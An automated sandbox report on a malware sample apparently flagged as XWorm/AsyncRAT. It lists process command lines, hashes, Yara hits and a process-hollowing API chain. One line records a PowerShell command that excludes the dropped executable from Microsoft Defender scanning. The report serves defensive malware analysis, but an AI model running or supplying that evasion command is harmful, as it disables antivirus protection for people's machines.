                                                            Target ID:6
                                                            Start time:02:30:02
                                                            Start date:25/09/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe"
                                                            Imagebase:0x1260000
                                                            File size:427'008 bytes
                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:02:30:02
                                                            Start date:25/09/2024
                                                            Path:C:\Users\user\AppData\Roaming\obibingf24242.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\obibingf24242.exe"
                                                            Imagebase:0x11e0000
                                                            File size:434'176 bytes
                                                            MD5 hash:A4CD1FF60C7B69DF5A061DF3365E60C7
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.936932565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.936932565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:9
                                                            Start time:02:30:19
                                                            Start date:25/09/2024
                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                            Imagebase:0x400000
                                                            File size:543'304 bytes
                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:13.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:4.7%
                                                              Total number of Nodes:129
                                                              Total number of Limit Nodes:4
                                                              execution_graph 8624 21d7e5 8625 21d9c2 8624->8625 8630 21e616 8625->8630 8647 21e5b8 8625->8647 8663 21e5a8 8625->8663 8626 21d9d2 8631 21e5a4 8630->8631 8633 21e619 8630->8633 8679 21ebac 8631->8679 8684 21ebea 8631->8684 8689 21ea44 8631->8689 8695 21ebe5 8631->8695 8699 21f082 8631->8699 8704 21e8c0 8631->8704 8710 21f3e1 8631->8710 8715 21f31a 8631->8715 8720 21ecd8 8631->8720 8725 21eeb8 8631->8725 8729 21f16e 8631->8729 8736 21efef 8631->8736 8741 21eb2c 8631->8741 8632 21e5f6 8632->8626 8648 21e5d2 8647->8648 8650 21f3e1 2 API calls 8648->8650 8651 21e8c0 2 API calls 8648->8651 8652 21f082 2 API calls 8648->8652 8653 21ebe5 2 API calls 8648->8653 8654 21ea44 2 API calls 8648->8654 8655 21ebea 2 API calls 8648->8655 8656 21ebac 2 API calls 8648->8656 8657 21eb2c 2 API calls 8648->8657 8658 21efef 2 API calls 8648->8658 8659 21f16e 4 API calls 8648->8659 8660 21eeb8 2 API calls 8648->8660 8661 21ecd8 2 API calls 8648->8661 8662 21f31a 2 API calls 8648->8662 8649 21e5f6 8649->8626 8650->8649 8651->8649 8652->8649 8653->8649 8654->8649 8655->8649 8656->8649 8657->8649 8658->8649 8659->8649 8660->8649 8661->8649 8662->8649 8664 21e5d2 8663->8664 8666 21f3e1 2 API calls 8664->8666 8667 21e8c0 2 API calls 8664->8667 8668 21f082 2 API calls 8664->8668 8669 21ebe5 2 API calls 8664->8669 8670 21ea44 2 API calls 8664->8670 8671 21ebea 2 API calls 8664->8671 8672 21ebac 2 API calls 8664->8672 8673 21eb2c 2 API calls 8664->8673 8674 21efef 2 API calls 8664->8674 8675 21f16e 4 API calls 8664->8675 8676 21eeb8 2 API calls 8664->8676 8677 21ecd8 2 API calls 8664->8677 8678 21f31a 2 API calls 8664->8678 8665 21e5f6 8665->8626 8666->8665 8667->8665 8668->8665 8669->8665 8670->8665 8671->8665 8672->8665 8673->8665 8674->8665 8675->8665 8676->8665 8677->8665 8678->8665 8680 21ebaf 8679->8680 8681 21ec16 8680->8681 8746 21c6c0 8680->8746 8750 21c6c8 8680->8750 8681->8632 8685 21ebf0 8684->8685 8687 21c6c0 ResumeThread 8685->8687 8688 21c6c8 ResumeThread 8685->8688 8686 21ec16 8686->8632 8687->8686 8688->8686 8691 21e977 8689->8691 8690 21ea3c 8690->8632 8691->8690 8754 21d1e0 8691->8754 8758 21d1d5 8691->8758 8696 21eb04 8695->8696 8696->8632 8696->8695 8762 21ce41 8696->8762 8766 21ce48 8696->8766 8700 21f20d 8699->8700 8770 21cd20 8700->8770 8774 21cd18 8700->8774 8701 21f22b 8706 21e903 8704->8706 8705 21ea3c 8705->8632 8706->8705 8708 21d1e0 CreateProcessA 8706->8708 8709 21d1d5 CreateProcessA 8706->8709 8707 21ead9 8707->8632 8708->8707 8709->8707 8711 21ec16 8710->8711 8712 21ebea 8710->8712 8711->8632 8713 21c6c0 ResumeThread 8712->8713 8714 21c6c8 ResumeThread 8712->8714 8713->8711 8714->8711 8716 21eb5d 8715->8716 8717 21eb7e 8715->8717 8718 21ce41 WriteProcessMemory 8716->8718 8719 21ce48 WriteProcessMemory 8716->8719 8717->8632 8718->8717 8719->8717 8721 21ebea 8720->8721 8723 21c6c0 ResumeThread 8721->8723 8724 21c6c8 ResumeThread 8721->8724 8722 21ec16 8722->8632 8723->8722 8724->8722 8778 21c7b1 8725->8778 8782 21c7b8 8725->8782 8726 21eed2 8726->8632 8730 21f174 8729->8730 8786 21cfa0 8730->8786 8790 21cfa8 8730->8790 8731 21eb04 8731->8632 8732 21ce41 WriteProcessMemory 8731->8732 8733 21ce48 WriteProcessMemory 8731->8733 8732->8731 8733->8731 8739 21ce41 WriteProcessMemory 8736->8739 8740 21ce48 WriteProcessMemory 8736->8740 8737 21ef08 8737->8736 8738 21f3db 8737->8738 8739->8737 8740->8737 8742 21eb45 8741->8742 8744 21ce41 WriteProcessMemory 8742->8744 8745 21ce48 WriteProcessMemory 8742->8745 8743 21eb7e 8743->8632 8744->8743 8745->8743 8747 21c70c ResumeThread 8746->8747 8749 21c75e 8747->8749 8749->8681 8751 21c70c ResumeThread 8750->8751 8753 21c75e 8751->8753 8753->8681 8755 21d267 CreateProcessA 8754->8755 8757 21d4c5 8755->8757 8757->8757 8759 21d267 CreateProcessA 8758->8759 8761 21d4c5 8759->8761 8761->8761 8763 21ce94 WriteProcessMemory 8762->8763 8765 21cf33 8763->8765 8765->8696 8767 21ce94 WriteProcessMemory 8766->8767 8769 21cf33 8767->8769 8769->8696 8771 21cd64 VirtualAllocEx 8770->8771 8773 21cde2 8771->8773 8773->8701 8775 21cd64 VirtualAllocEx 8774->8775 8777 21cde2 8775->8777 8777->8701 8779 21c801 Wow64SetThreadContext 8778->8779 8781 21c87f 8779->8781 8781->8726 8783 21c801 Wow64SetThreadContext 8782->8783 8785 21c87f 8783->8785 8785->8726 8787 21cff4 ReadProcessMemory 8786->8787 8789 21d072 8787->8789 8789->8731 8791 21cff4 ReadProcessMemory 8790->8791 8793 21d072 8791->8793 8793->8731

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P?6o$C6o
                                                              • API String ID: 0-1501814093
                                                              • Opcode ID: 9d4cbb2577034263a4c7908f2265224c6f5a4b893cfc26ef3ccd6116e8186ddb
                                                              • Instruction ID: efed5da7d83381e0d891245f1251b94c3ece19ea331a0fe1a0f8fdd798f8c030
                                                              • Opcode Fuzzy Hash: 9d4cbb2577034263a4c7908f2265224c6f5a4b893cfc26ef3ccd6116e8186ddb
                                                              • Instruction Fuzzy Hash: 31C2D334A11218CFDB24EB64C894BD9B7B2BF9A300F5145EAE4096B365DB71AEC1CF50

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P?6o$C6o
                                                              • API String ID: 0-1501814093
                                                              • Opcode ID: 4cc7c74fc2f0e629fc2fbc0a8113df7c6fe3e8f726005bc3c0f7b18195d8f060
                                                              • Instruction ID: ad148e7d777b76d94ab3b25639b96df161ba93203817a6fff56ed6a2e3912723
                                                              • Opcode Fuzzy Hash: 4cc7c74fc2f0e629fc2fbc0a8113df7c6fe3e8f726005bc3c0f7b18195d8f060
                                                              • Instruction Fuzzy Hash: CBC2D234A11218CFDB24EB64C894BD9B3B2BF9A300F5145EAE4096B365DB71AED1CF50
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 940275f3f0d16c862e1c919b3c83e872811528693e51dac5109a83dc060cea37
                                                              • Instruction ID: 02b1e4dd4078f7f6edeced11eff3d7e483dbf85bf348dbcaaeada5f5adeecd04
                                                              • Opcode Fuzzy Hash: 940275f3f0d16c862e1c919b3c83e872811528693e51dac5109a83dc060cea37
                                                              • Instruction Fuzzy Hash: 3AC1FFB4D14258CBDB14EFAAD8846EEBBF2BF99304F24916AD41DBB241D7708995CF00
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8ffe1986d805ff6b0532e956584e3e1eebea8ffd011acce81094ed3b0945cd73
                                                              • Instruction ID: fed38560134773c34092f6ac5580071e751bba226637be52e58ff86f52aec580
                                                              • Opcode Fuzzy Hash: 8ffe1986d805ff6b0532e956584e3e1eebea8ffd011acce81094ed3b0945cd73
                                                              • Instruction Fuzzy Hash: 00611671D54229CBDB68CF66CC407E9FBF6BF99300F1491AAD809A6250EBB05AD5CF40

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 629 21d1d5-21d279 631 21d2c2-21d2ea 629->631 632 21d27b-21d292 629->632 635 21d330-21d386 631->635 636 21d2ec-21d300 631->636 632->631 637 21d294-21d299 632->637 646 21d388-21d39c 635->646 647 21d3cc-21d4c3 CreateProcessA 635->647 636->635 644 21d302-21d307 636->644 638 21d29b-21d2a5 637->638 639 21d2bc-21d2bf 637->639 641 21d2a7 638->641 642 21d2a9-21d2b8 638->642 639->631 641->642 642->642 645 21d2ba 642->645 648 21d309-21d313 644->648 649 21d32a-21d32d 644->649 645->639 646->647 654 21d39e-21d3a3 646->654 665 21d4c5-21d4cb 647->665 666 21d4cc-21d5b1 647->666 651 21d315 648->651 652 21d317-21d326 648->652 649->635 651->652 652->652 655 21d328 652->655 656 21d3a5-21d3af 654->656 657 21d3c6-21d3c9 654->657 655->649 659 21d3b1 656->659 660 21d3b3-21d3c2 656->660 657->647 659->660 660->660 661 21d3c4 660->661 661->657 665->666 678 21d5c1-21d5c5 666->678 679 21d5b3-21d5b7 666->679 681 21d5d5-21d5d9 678->681 682 21d5c7-21d5cb 678->682 679->678 680 21d5b9 679->680 680->678 683 21d5e9-21d5ed 681->683 684 21d5db-21d5df 681->684 682->681 685 21d5cd 682->685 687 21d623-21d62e 683->687 688 21d5ef-21d618 683->688 684->683 686 21d5e1 684->686 685->681 686->683 692 21d62f 687->692 688->687 692->692
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0021D4A7
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 6c8b3867713ff2844081ddc8751a46870a4dab7e097e6a1d3f6ee9af5a18a30b
                                                              • Instruction ID: e589261da7599b79b33c867a4d918e219a7e29539d80c0fb0ff55638d4a387ea
                                                              • Opcode Fuzzy Hash: 6c8b3867713ff2844081ddc8751a46870a4dab7e097e6a1d3f6ee9af5a18a30b
                                                              • Instruction Fuzzy Hash: D5C11570D1022ACFDB20DFA4C881BEDBBB1BF59304F0095AAD859B7240DB749A95CF95

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 693 21d1e0-21d279 695 21d2c2-21d2ea 693->695 696 21d27b-21d292 693->696 699 21d330-21d386 695->699 700 21d2ec-21d300 695->700 696->695 701 21d294-21d299 696->701 710 21d388-21d39c 699->710 711 21d3cc-21d4c3 CreateProcessA 699->711 700->699 708 21d302-21d307 700->708 702 21d29b-21d2a5 701->702 703 21d2bc-21d2bf 701->703 705 21d2a7 702->705 706 21d2a9-21d2b8 702->706 703->695 705->706 706->706 709 21d2ba 706->709 712 21d309-21d313 708->712 713 21d32a-21d32d 708->713 709->703 710->711 718 21d39e-21d3a3 710->718 729 21d4c5-21d4cb 711->729 730 21d4cc-21d5b1 711->730 715 21d315 712->715 716 21d317-21d326 712->716 713->699 715->716 716->716 719 21d328 716->719 720 21d3a5-21d3af 718->720 721 21d3c6-21d3c9 718->721 719->713 723 21d3b1 720->723 724 21d3b3-21d3c2 720->724 721->711 723->724 724->724 725 21d3c4 724->725 725->721 729->730 742 21d5c1-21d5c5 730->742 743 21d5b3-21d5b7 730->743 745 21d5d5-21d5d9 742->745 746 21d5c7-21d5cb 742->746 743->742 744 21d5b9 743->744 744->742 747 21d5e9-21d5ed 745->747 748 21d5db-21d5df 745->748 746->745 749 21d5cd 746->749 751 21d623-21d62e 747->751 752 21d5ef-21d618 747->752 748->747 750 21d5e1 748->750 749->745 750->747 756 21d62f 751->756 752->751 756->756
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0021D4A7
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 25b9a1eda1b288989fb5c1ec7062b0d5106ca6e1b55bbc2a6ae9a8975f9b22a6
                                                              • Instruction ID: 16283c66aba2dcf1c42cd7d54ab51dfe559105768c90d65f960edf546f1197e6
                                                              • Opcode Fuzzy Hash: 25b9a1eda1b288989fb5c1ec7062b0d5106ca6e1b55bbc2a6ae9a8975f9b22a6
                                                              • Instruction Fuzzy Hash: B2C10470D1022ACFDB24DFA4C881BEEBBB1BF59304F0095A9D819B7240DB749A95CF95

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 757 21ce41-21ceb3 759 21ceb5-21cec7 757->759 760 21ceca-21cf31 WriteProcessMemory 757->760 759->760 762 21cf33-21cf39 760->762 763 21cf3a-21cf8c 760->763 762->763
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0021CF1B
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: ee4ace87480ff280c75eb90e35044db8be17624f0582cba4fcb18ae8e76ddc3b
                                                              • Instruction ID: dfb46f5df0931e1b0a114ec1e9438114dc118b00839430777a08395e46af7ae9
                                                              • Opcode Fuzzy Hash: ee4ace87480ff280c75eb90e35044db8be17624f0582cba4fcb18ae8e76ddc3b
                                                              • Instruction Fuzzy Hash: 0C41A9B4D012489FCF00CFA9D984AEEBBF1BF49314F20942AE815B7250C778AA55CF64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 768 21ce48-21ceb3 770 21ceb5-21cec7 768->770 771 21ceca-21cf31 WriteProcessMemory 768->771 770->771 773 21cf33-21cf39 771->773 774 21cf3a-21cf8c 771->774 773->774
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0021CF1B
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 499e950b6696b5cf82b6485e74633b0e2ae802d0f7a859d0c252fafce50d192c
                                                              • Instruction ID: e92c5d2d58ab36bd12bc97210fa025250a4f379f67d8cd859cc04fdfede25360
                                                              • Opcode Fuzzy Hash: 499e950b6696b5cf82b6485e74633b0e2ae802d0f7a859d0c252fafce50d192c
                                                              • Instruction Fuzzy Hash: D141A8B4D012489FCF00DFA9D984AEEFBF1BB49314F20902AE815B7250D778AA55CF64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 779 21cfa0-21d070 ReadProcessMemory 782 21d072-21d078 779->782 783 21d079-21d0cb 779->783 782->783
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0021D05A
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 92898769b2e037bfd9cc6d8a0e37f16be4ea34a1f72a9dc2d733e60085d52a9b
                                                              • Instruction ID: 13135ab0491f762e66d514303b079bc5d8fd3f2c2a8cbd300c114b92399e40e9
                                                              • Opcode Fuzzy Hash: 92898769b2e037bfd9cc6d8a0e37f16be4ea34a1f72a9dc2d733e60085d52a9b
                                                              • Instruction Fuzzy Hash: D541ABB8D00258DFCF10CFA9D884AEEFBB1BB59310F20942AE815B7240D775A956CF65

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 788 21cfa8-21d070 ReadProcessMemory 791 21d072-21d078 788->791 792 21d079-21d0cb 788->792 791->792
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0021D05A
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 6db96db666aa05b52a5ddb2715ecc5043d5e5c3debcb71f0f985ed2e04eb596a
                                                              • Instruction ID: 2f27f0831e8a9964905594573ab5c78a6a20d7137f11d3734a15fcd7e694d58d
                                                              • Opcode Fuzzy Hash: 6db96db666aa05b52a5ddb2715ecc5043d5e5c3debcb71f0f985ed2e04eb596a
                                                              • Instruction Fuzzy Hash: AD419AB4D00258DFCF10DFA9D884AEEFBB1BB59310F20942AE814B7240D775AA55CFA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 797 21cd20-21cde0 VirtualAllocEx 800 21cde2-21cde8 797->800 801 21cde9-21ce33 797->801 800->801
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0021CDCA
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 98f76baeb47f0ac490b96656819215fa25ab956b682306b07ff09327b10e4af3
                                                              • Instruction ID: 18d288a2e79159ec804ae2a9e40b20d702300983ccb31e6f3c66d18fa6981e28
                                                              • Opcode Fuzzy Hash: 98f76baeb47f0ac490b96656819215fa25ab956b682306b07ff09327b10e4af3
                                                              • Instruction Fuzzy Hash: 7E4199B8D002589FCF10DFA9D884ADEBBB1BB49310F20942AE814B7310D775A955CF95

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 806 21cd18-21cde0 VirtualAllocEx 809 21cde2-21cde8 806->809 810 21cde9-21ce33 806->810 809->810
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0021CDCA
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 30f9842df095b8aa208298116c8405776902e877f4a73dbed65ad98e3b392799
                                                              • Instruction ID: 3f8a73c776812c5af4846199bbfb5b8f1b91222cf130a5bea57022772fb67b64
                                                              • Opcode Fuzzy Hash: 30f9842df095b8aa208298116c8405776902e877f4a73dbed65ad98e3b392799
                                                              • Instruction Fuzzy Hash: 5741A8B8D002189FCF10CFA9D984AEEFBB1BF59310F20942AE814B7200D735A955CF95

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 815 21c7b1-21c818 817 21c81a-21c82c 815->817 818 21c82f-21c87d Wow64SetThreadContext 815->818 817->818 820 21c886-21c8d2 818->820 821 21c87f-21c885 818->821 821->820
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0021C867
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: e6a2d1bdb1f9309a5c0d25db080f6e1b75dbb971a2c1ab4bd8431360f90f0a22
                                                              • Instruction ID: 2262573da6030cc055bc85cf3957c9ddbc962eb87442a798080d7ba4abf0fbbf
                                                              • Opcode Fuzzy Hash: e6a2d1bdb1f9309a5c0d25db080f6e1b75dbb971a2c1ab4bd8431360f90f0a22
                                                              • Instruction Fuzzy Hash: AC41CFB4D112589FDB10DFA9D884AEEFBF1BF48314F24802AE414B7240C7789A85CF54

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 826 21c7b8-21c818 828 21c81a-21c82c 826->828 829 21c82f-21c87d Wow64SetThreadContext 826->829 828->829 831 21c886-21c8d2 829->831 832 21c87f-21c885 829->832 832->831
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0021C867
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: d30132861caae28bb33e5ce7da984bcbe3301946176893caec79885295c2032f
                                                              • Instruction ID: 2c22dcb8686bb44b9429e2503358c6c9ebbfaaa4e5e00fb0fc88a258efa5cb09
                                                              • Opcode Fuzzy Hash: d30132861caae28bb33e5ce7da984bcbe3301946176893caec79885295c2032f
                                                              • Instruction Fuzzy Hash: D041AFB4D112589FDB14DFA9D484AEEFBF1BF49314F24802AE414B7240D778AA45CF54

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 837 21c6c0-21c75c ResumeThread 840 21c765-21c7a7 837->840 841 21c75e-21c764 837->841 841->840
                                                              APIs
                                                              • ResumeThread.KERNELBASE(?), ref: 0021C746
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 8435fa811afa9d5796286c75e3d76e99edc719d8bf25c40ead058e01e3c0864e
                                                              • Instruction ID: 7d9a9070f042a2e09cb58c65ec59f6b51cc6bec9e1b2bfeff5ef58e0d05796ea
                                                              • Opcode Fuzzy Hash: 8435fa811afa9d5796286c75e3d76e99edc719d8bf25c40ead058e01e3c0864e
                                                              • Instruction Fuzzy Hash: 0431EAB8D102089FCF10DFA9D884AEEFBB4AF89310F20801AE815B7340C775A906CF95
                                                              APIs
                                                              • ResumeThread.KERNELBASE(?), ref: 0021C746
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 17f768e94e7a8c6e2eddf59baa2069cf238a5aca150d2e18acd3a60c846c2114
                                                              • Instruction ID: 43b8fcb6f3f6d478b4fc25fbc4f777de225d4a3beafc3dcb85cbc5a633ccef05
                                                              • Opcode Fuzzy Hash: 17f768e94e7a8c6e2eddf59baa2069cf238a5aca150d2e18acd3a60c846c2114
                                                              • Instruction Fuzzy Hash: 6F31D9B8D102189FCF14DFA9D884AEEFBB4AF89310F20842AE814B7340D775A945CF95
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.423851016.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_17d000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ff9c890f84827c24eb2892648a0a9a294f355a2d956894740b25f641da4d69f
                                                              • Instruction ID: d1a9d48e87b4f80a46b9940e5fcafb428f147365e65496ef0e54ba1c117dc950
                                                              • Opcode Fuzzy Hash: 7ff9c890f84827c24eb2892648a0a9a294f355a2d956894740b25f641da4d69f
                                                              • Instruction Fuzzy Hash: 8721B075604248EFEB05DF14E9C0B26BBB5EF84314F34C5A9E8494B282C336D947CA61
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.423851016.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_17d000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 17d8f069ffb4db388d041fa8c61e63df72b20aae1a01659dbbfe3c221c30d268
                                                              • Instruction ID: 32294d08661681a6f7c5afb990ecea5863ffe76251080a11ad231ff6337f4e72
                                                              • Opcode Fuzzy Hash: 17d8f069ffb4db388d041fa8c61e63df72b20aae1a01659dbbfe3c221c30d268
                                                              • Instruction Fuzzy Hash: D521CF75604248DFDB14DF14E8C4B16BB75EF84314F34C5A9E80D4B286C33AD846CAA1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.423851016.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_17d000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ad69c760fa5fc387b1cbfc2d2d398989e5cf2a715cc84ae81aa90ccb4c88888d
